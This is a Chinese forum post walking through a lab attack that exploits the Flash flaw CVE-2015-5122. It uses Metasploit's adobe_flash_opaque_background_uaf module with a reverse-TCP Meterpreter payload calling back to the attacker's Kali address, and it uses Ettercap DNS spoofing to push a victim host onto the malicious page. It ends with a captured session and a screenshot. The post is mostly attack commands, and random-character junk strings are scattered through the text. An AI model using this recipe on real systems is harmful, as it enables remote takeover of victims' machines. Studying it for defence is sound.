cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

1 F* i6 `+ ]) z- w( f+ I4 }, H9 K 二、cve2015-5122漏洞实例演示虚拟机 % R, {/ A" j# P6 g4 y$ f0 ]/ ~

; A5 ]2 |0 S. N0 c3 k 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 1 ~* \1 F1 q' a/ c7 y

. G5 d' C' u! M. K2 S0 q search cve-2015-5122如图： 2 g( S7 I0 X+ C8 N( G- Z

[+ W' P2 b3 `' g+ @: O! v # c x, M! h% l" T, M) e

, ?, w7 v9 b9 h1 S9 P5 D M 下面我们敲如下命令： % } p h& p3 R1 ^

) ?3 l$ z" K; v4 z5 @& a use exploit/multi/browser/adobe_flash_opaque_background_uaf - r3 l2 k1 {& ]: @3 f

# c" D$ [6 |! H, ^ set PAYLOAD windows/meterpreter/reverse_tcp . i5 u9 F7 z. b5 i' S9 g

3 O# T$ |9 v" ]: }, D' |% J) C' E set LHOST 192.168.0.109 $ J' S& B: Z% A* l2 \7 W

+ Y7 |1 m: @, z0 P8 ^* F0 M. U$ b2 X set URIPATH / /*根目录*/ + f, @ s6 F% L9 ]" Q

6 t T) ~0 _7 e: j: E& S set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 3 J5 A, k7 |% u) w# X

Y) {0 _: s. F. A set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ( q L0 a2 o+ c1 {+ }# G/ t1 P

4 n% ?# W) A) U" V+ P( w/ ^ 然后show options如图： 9 d2 x5 p8 U$ E% z! Y! z

9 s4 b! U- z; J . c8 p+ R) O$ J( x9 R, F4 Q7 O

0 v0 t3 r+ Y2 t, G7 { 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
. v& j# V% E/ G- o8 g 6 u4 u( F6 ?" r. f& p# x. l1 x) u

8 n7 Q6 E( |! W- i5 b' V 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ! Z; a- W: n4 J; y+ G

. y% Q5 O4 n4 p Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 0 x& s; U5 q* X

) c4 J% b) C: R5 l. }+ [, E 6 {8 ~2 }/ w5 |; @' }: m

% M' V, F, I; n. p# J% S 成功了，这时候我们断开ettercap，如图： / w! }/ }! [$ g4 j& x

) u! p2 R- W) u2 W8 J : j1 l; m* v1 h. n% r6 L) z2 R( Q

. e5 W3 ]3 u* u& _7 E0 y. K Screenshot如图： & V4 W3 O* s& B" D/ u: K: p

J+ H% W: F7 ^5 w8 G : Y( c& B. h: \6 M, s

3 M7 f v4 a( I- |# i" t8 H! D ; j( ^& Q9 M% F: L" R! r/ o

		自动登录	找回密码
密码			立即注册